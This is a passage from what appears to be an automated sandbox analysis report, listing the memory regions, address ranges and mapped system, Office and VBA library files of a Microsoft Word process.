"private_0x000007fffffd6000" filename = "" Region: id = 403 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 404 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 405 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 406 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 407 start_va = 0x2dd0000 end_va = 0x2dd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002dd0000" filename = "" Region: id = 408 start_va = 0x2de0000 end_va = 0x2de0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002de0000" filename = "" Region: id = 409 start_va = 0x2f20000 end_va = 0x2f9efff entry_point = 0x2f20000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 410 start_va = 0x7fee4ab0000 end_va = 0x7fee4d04fff entry_point = 0x7fee4ab0000 region_type = mapped_file name = "ivy.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\IVY.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ivy.dll") Region: id = 411 start_va = 0x7fee4d10000 end_va = 0x7fee5ae5fff entry_point = 0x7fee4d10000 region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\chart.dll") Region: id = 412 start_va = 0x2df0000 end_va = 0x2df1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002df0000" filename = "" Region: id = 413 start_va = 0x7fefb3a0000 end_va = 0x7fefb569fff entry_point = 0x7fefb3a0000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 414 start_va = 0x7fefc140000 end_va = 0x7fefc182fff entry_point = 0x7fefc140000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 415 start_va = 0x7fefc190000 end_va = 0x7fefc281fff entry_point = 0x7fefc190000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 416 start_va = 0x6220000 end_va = 0x62cafff entry_point = 0x6220000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 417 start_va = 0x8580000 end_va = 0x8980fff entry_point = 0x0 region_type = private name = "private_0x0000000008580000" filename = "" Region: id = 418 start_va = 0x8990000 end_va = 0x8d90fff entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 419 start_va = 0x8da0000 end_va = 0x91a0fff entry_point = 0x0 region_type = private name = "private_0x0000000008da0000" filename = "" Region: id = 420 start_va = 0x7fffff80000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 421 start_va = 0x2fa0000 end_va = 0x2fa1fff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 422 start_va = 0x2fb0000 end_va = 0x2fb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 423 start_va = 0x30c0000 end_va = 0x30d0fff entry_point = 0x30c0000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 424 start_va = 0x91b0000 end_va = 0x93affff entry_point = 0x0 region_type = private name = "private_0x00000000091b0000" filename = "" Region: id = 425 start_va = 0x93b0000 end_va = 0xa3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000093b0000" filename = "" Region: id = 426 start_va = 0xa3c0000 end_va = 0xa7bffff entry_point = 0x0 region_type = private name = "private_0x000000000a3c0000" filename = "" Region: id = 427 start_va = 0x7fffff70000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 428 start_va = 0x2910000 end_va = 0x298ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002910000" filename = "" Region: id = 429 start_va = 0x2c90000 end_va = 0x2d0ffff entry_point = 0x2c90000 region_type = mapped_file name = "~dff13df5e34bf86c9b.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DFF13DF5E34BF86C9B.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~dff13df5e34bf86c9b.tmp") Region: id = 430 start_va = 0x7fee4680000 end_va = 0x7fee4aadfff entry_point = 0x7fee4680000 region_type = mapped_file name = "gkword.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\gkword.dll") Region: id = 431 start_va = 0x420000 end_va = 0x422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 432 start_va = 0x75540000 end_va = 0x75611fff entry_point = 0x75540000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcr100.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcr100.dll") Region: id = 433 start_va = 0x7fee4170000 end_va = 0x7fee4229fff entry_point = 0x7fee4170000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 434 start_va = 0x7fee4230000 end_va = 0x7fee4677fff entry_point = 0x7fee4230000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 435 start_va = 0x7fef3ed0000 end_va = 0x7fef3f23fff entry_point = 0x7fef3ed0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 436 start_va = 0x430000 end_va = 0x430fff entry_point = 0x430000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 437 start_va = 0x2720000 end_va = 0x2730fff entry_point = 0x2720000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 438 start_va = 0x2740000 end_va = 0x274ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 439 start_va = 0x2990000 end_va = 0x2991fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 440 start_va = 0x29a0000 end_va = 0x29a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029a0000" filename = "" Region: id = 441 start_va = 0x4dd0000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 442 start_va = 0x7fee3cf0000 end_va = 0x7fee4168fff entry_point = 0x7fee3cf0000 region_type = mapped_file name = "gfx.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\gfx.dll") Region: id = 443 start_va = 0x7fef8360000 end_va = 0x7fef8366fff entry_point = 0x7fef8360000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 444 start_va = 0x2d10000 end_va = 0x2d10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d10000" filename = "" Region: id = 445 start_va = 0x4ed0000 end_va = 0x4f96fff entry_point = 0x4ed0000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 446 start_va = 0xa7c0000 end_va = 0xab71fff entry_point = 0x0 region_type = private name = "private_0x000000000a7c0000" filename = "" Region: id = 447 start_va = 0x7fef8e40000 end_va = 0x7fef8e4bfff entry_point = 0x7fef8e40000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 448 start_va = 0x7fef9b40000 end_va = 0x7fef9bbffff entry_point = 0x7fef9b40000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 449 start_va = 0x7fef9bc0000 end_va = 0x7fef9bcefff entry_point = 0x7fef9bc0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 450 start_va = 0x7fefb730000 end_va = 0x7fefb73afff entry_point = 0x7fefb730000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 451 start_va = 0x7fefda90000 end_va = 0x7fefdb20fff entry_point = 0x7fefda90000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 452 start_va = 0xab80000 end_va = 0xac62fff entry_point = 0xab80000 region_type = mapped_file name = "msword.olb" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msword.olb") Region: id = 453 start_va = 0xac70000 end_va = 0xaf01fff entry_point = 0xac70000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 454 start_va = 0xac70000 end_va = 0xaf01fff entry_point = 0xac70000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 455 start_va = 0x7fee3a50000 end_va = 0x7fee3cedfff entry_point = 0x7fee3a50000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 456 start_va = 0x2d20000 end_va = 0x2d22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d20000" filename = "" Region: id = 457 start_va = 0x2d30000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 458 start_va = 0x7fef92d0000 end_va = 0x7fef92f5fff entry_point = 0x7fef92d0000 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 459 start_va = 0x2d40000 end_va = 0x2d49fff entry_point = 0x2d40000 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 460 start_va = 0x2d50000 end_va = 0x2d50fff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 461 start_va = 0x2d60000 end_va = 0x2d60fff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 462 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x3800000 region_type = mapped_file name = "~wrf{3cd5945e-7cc7-472f-a242-da5d0de3aeb4}.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{3CD5945E-7CC7-472F-A242-DA5D0DE3AEB4}.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{3cd5945e-7cc7-472f-a242-da5d0de3aeb4}.tmp") Region: id = 463 start_va = 0xac70000 end_va = 0xbc6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ac70000" filename = "" Region: id = 464 start_va = 0x3ac0000 end_va = 0x3afffff entry_point = 0x0 region_type = private name = "private_0x0000000003ac0000" filename = "" Region: id = 465 start_va = 0x2d70000 end_va = 0x2d72fff entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 466 start_va = 0x2d80000 end_va = 0x2d83fff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 467 start_va = 0x2e10000 end_va = 0x2e10fff entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 468 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 469 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 470 start_va = 0x3880000 end_va = 0x3887fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 471 start_va = 0x3b00000 end_va = 0x3b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 472 start_va = 0x38a0000 end_va = 0x38a2fff entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 473 start_va = 0x38b0000 end_va = 0x38bbfff entry_point = 0x38b0000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 474 start_va = 0x3fc0000 end_va = 0x3fc3fff entry_point = 0x3fc0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 475 start_va = 0x7f50000 end_va = 0x7fd5fff entry_point = 0x7f50000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 476 start_va = 0x3fd0000 end_va = 0x3ff5fff entry_point = 0x3fd0000 region_type = mapped_file name = "fm20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20.dll") Region: id = 477 start_va = 0x5030000 end_va = 0x5033fff entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 478 start_va = 0x5040000 end_va = 0x5043fff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 479 start_va = 0x5050000 end_va = 0x5052fff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 480 start_va = 0x8070000 end_va = 0x80effff entry_point = 0x8070000 region_type = mapped_file name = "~df834800654bb3e1d0.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DF834800654BB3E1D0.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~df834800654bb3e1d0.tmp") Region: id = 481 start_va = 0x5060000 end_va = 0x5067fff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 482 start_va = 0x5a20000 end_va = 0x5a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a20000" filename = "" Region: id = 483 start_va = 0x5a60000 end_va = 0x5a62fff entry_point = 0x0 region_type = private name = "private_0x0000000005a60000" filename = "" Region: id = 484 start_va = 0x5a70000 end_va = 0x5a7dfff entry_point = 0x5a70000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 485 start_va = 0xbe10000 end_va = 0xbf0ffff entry_point = 0x0 region_type = private name = "private_0x000000000be10000" filename = "" Region: id = 486 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 487 start_va = 0x7fee3520000 end_va = 0x7fee3a4afff entry_point = 0x7fee3520000 region_type = mapped_file name = "vbeuires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeuires.dll") Region: id = 488 start_va = 0x5a80000 end_va = 0x5a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a80000" filename = "" Region: id = 489 start_va = 0x7fee3310000 end_va = 0x7fee3518fff entry_point = 0x7fee3310000 region_type = mapped_file name = "vbeuiintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\1033\\vbeuiintl.dll") Region: id = 490 start_va = 0x5b90000 end_va = 0x5b90fff entry_point = 0x0 region_type = private name = "private_0x0000000005b90000" filename = "" Region: id = 491 start_va = 0x5ba0000 end_va = 0x5ba0fff entry_point = 0x0 region_type = private name = "private_0x0000000005ba0000" filename = "" Region: id = 492 start_va = 0x5bb0000 end_va = 0x5bb0fff entry_point = 0x0 region_type = private name = "private_0x0000000005bb0000" filename = "" Region: id = 493 start_va = 0x5bc0000 end_va = 0x5bc9fff entry_point = 0x5bc0000 region_type = mapped_file name = "vbe6ext.olb" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba6\\vbe6ext.olb") Region: id = 494 start_va = 0x7fee3150000 end_va = 0x7fee3308fff entry_point = 0x7fee3150000 region_type = mapped_file name = "fm20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20.dll") Region: id = 495 start_va = 0xbc70000 end_va = 0xbceffff entry_point = 0x0 region_type = private name = "private_0x000000000bc70000" filename = "" Region: id = 496 start_va = 0xbf10000 end_va = 0xc10ffff entry_point = 0x0 region_type = private name = "private_0x000000000bf10000" filename = "" Region: id = 497 start_va = 0x7fef9360000 end_va = 0x7fef9367fff entry_point = 0x7fef9360000 region_type = mapped_file name = "fm20enu.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20ENU.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20enu.dll") Region: id = 498 start_va = 0x5bd0000 end_va = 0x5bf1fff entry_point = 0x5bd0000 region_type = mapped_file name = "fm20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20.dll") Region: id = 499 start_va = 0x5d10000 end_va = 0x5d35fff entry_point = 0x5d10000 region_type = mapped_file name = "fm20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20.dll") Region: id = 500 start_va = 0x5d40000 end_va = 0x5d43fff entry_point = 0x5d40000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 501 start_va = 0x5e50000 end_va = 0x5e53fff entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 502 start_va = 0x5e60000 end_va = 0x5e63fff entry_point = 0x0 region_type = private name = "private_0x0000000005e60000" filename = "" Region: id = 503 start_va = 0x5e70000 end_va = 0x5e73fff entry_point = 0x0 region_type = private name = "private_0x0000000005e70000" filename = "" Region: id = 621 start_va = 0x5e80000 end_va = 0x5e80fff entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 622 start_va = 0x5eb0000 end_va = 0x5eb1fff entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 623 start_va = 0x5ee0000 end_va = 0x5ee1fff entry_point = 0x0 region_type = private name = "private_0x0000000005ee0000" filename = "" Region: id = 624 start_va = 0x5f00000 end_va = 0x5f01fff entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 625 start_va = 0x63d0000 end_va = 0x63d1fff entry_point = 0x0 region_type = private name = "private_0x00000000063d0000" filename = "" Region: id = 626 start_va = 0x63f0000 end_va = 0x63f1fff entry_point = 0x0 region_type = private name = "private_0x00000000063f0000" filename = "" Region: id = 627 start_va = 0x6510000 end_va = 0x6511fff entry_point = 0x0 region_type = private name = "private_0x0000000006510000" filename = "" Region: id = 628 start_va = 0x6520000 end_va = 0x6520fff entry_point = 0x0 region_type = private name = "private_0x0000000006520000" filename = "" Region: id = 629 start_va = 0x6540000 end_va = 0x6541fff entry_point = 0x0 region_type = private name = "private_0x0000000006540000" filename = "" Region: id = 630 start_va = 0x80f0000 end_va = 0x80f1fff entry_point = 0x0 region_type = private name = "private_0x00000000080f0000" filename = "" Region: id = 631 start_va = 0xbcf0000 end_va = 0xbdbbfff entry_point = 0xbcf0000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 632 start_va = 0xbdd0000 end_va = 0xbdd1fff entry_point = 0x0 region_type = private name = "private_0x000000000bdd0000" filename = "" Region: id = 633 start_va = 0xbdf0000 end_va = 0xbdf1fff entry_point = 0x0 region_type = private name = "private_0x000000000bdf0000" filename = "" Region: id = 634 start_va = 0xc110000 end_va = 0xc1ddfff entry_point = 0xc110000 region_type = mapped_file name = "timesbd.ttf" filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf") Region: id = 635 start_va = 0xc270000 end_va = 0xca6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c270000" filename = "" Region: id = 636 start_va = 0xca70000 end_va = 0xcb29fff entry_point = 0xca70000 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 637 start_va = 0xcb30000 end_va = 0xcc04fff entry_point = 0xcb30000 region_type = mapped_file name = "calibrili.ttf" filename = "\\Windows\\Fonts\\CalibriLI.ttf" (normalized: "c:\\windows\\fonts\\calibrili.ttf") Region: id = 638 start_va = 0xcc10000 end_va = 0xcce0fff entry_point = 0xcc10000 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 639 start_va = 0xccf0000 end_va = 0xce36fff entry_point = 0x0 region_type = private name = "private_0x000000000ccf0000" filename = "" Region: id = 640 start_va = 0xce40000 end_va = 0xcf86fff entry_point = 0x0 region_type = private name = "private_0x000000000ce40000" filename = "" Region: id = 641 start_va = 0x7fee30b0000 end_va = 0x7fee314bfff entry_point = 0x7fee30b0000 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\System32\\mscms.dll" (normalized: "c:\\windows\\system32\\mscms.dll") Region: id = 681 start_va = 0x5e90000 end_va = 0x5e90fff entry_point = 0x0 region_type = private name = "private_0x0000000005e90000" filename = "" Region: id = 682 start_va = 0xccf0000 end_va = 0xcdeffff entry_point = 0x0 region_type = private name = "private_0x000000000ccf0000" filename = "" Region: id = 683 start_va = 0xcf90000 end_va = 0xd0defff entry_point = 0x0 region_type = private name = "private_0x000000000cf90000" filename = "" Region: id = 684 start_va = 0xdc10000 end_va = 0xdd0ffff entry_point = 0x0 region_type = private name = "private_0x000000000dc10000" filename = "" Region: id = 685 start_va = 0x7fef3780000 end_va = 0x7fef37d5fff entry_point = 0x7fef3780000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msproof7.dll") Region: id = 686 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 687 start_va = 0xdd10000 end_va = 0xecdffff entry_point = 0x0 region_type = private name = "private_0x000000000dd10000" filename = "" Region: id = 688 start_va = 0x7fee1720000 end_va = 0x7fee1827fff entry_point = 0x7fee1720000 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1033\\msgr8en.dll") Region: id = 1061 start_va = 0x5ea0000 end_va = 0x5ea0fff entry_point = 0x5ea0000 region_type = mapped_file name = "msgr8en.dub" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.dub") Region: id = 1062 start_va = 0x5ef0000 end_va = 0x5ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000005ef0000" filename = "" Region: id = 1063 start_va = 0x5f10000 end_va = 0x5f10fff entry_point = 0x0 region_type = private name = "private_0x0000000005f10000" filename = "" Region: id = 1064 start_va = 0x63e0000 end_va = 0x63e0fff entry_point = 0x0 region_type = private name = "private_0x00000000063e0000" filename = "" Region: id = 1065 start_va = 0x6400000 end_va = 0x6400fff entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1066 start_va = 0xc1e0000 end_va = 0xc1f1fff entry_point = 0x0 region_type = private name = "private_0x000000000c1e0000" filename = "" Region: id = 1067 start_va = 0xece0000 end_va = 0xf829fff entry_point = 0xece0000 region_type = mapped_file name = "msgr8en.lex" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.lex") Region: id = 1068 start_va = 0x7fefd210000 end_va = 0x7fefd266fff entry_point = 0x7fefd210000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1069 start_va = 0x5ed0000 end_va = 0x5ed1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ed0000" filename = "" Region: id = 1070 start_va = 0x6530000 end_va = 0x6531fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006530000" filename = "" Region: id = 1071 start_va = 0xd140000 end_va = 0xd23ffff entry_point = 0x0 region_type = private name = "private_0x000000000d140000" filename = "" Region: id = 1072 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1073 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1361 start_va = 0x7fedd900000 end_va = 0x7fedda1efff entry_point = 0x7fedd900000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 5162 start_va = 0xd240000 end_va = 0xd33ffff entry_point = 0x0 region_type = private name = "private_0x000000000d240000" filename = "" Region: id = 5163 start_va = 0xd480000 end_va = 0xd57ffff entry_point = 0x0 region_type = private name = "private_0x000000000d480000" filename = "" Region: id = 5164 start_va = 0x2fc0000 end_va = 0x3076fff entry_point = 0x2fc0000 region_type = mapped_file name = "arialbd.ttf" filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf") Region: id = 5165 start_va = 0x2910000 end_va = 0x2911fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002910000" filename = "" Region: id = 5166 start_va = 0x7fef91c0000 end_va = 0x7fef922dfff entry_point = 0x7fef91c0000 region_type = mapped_file name = 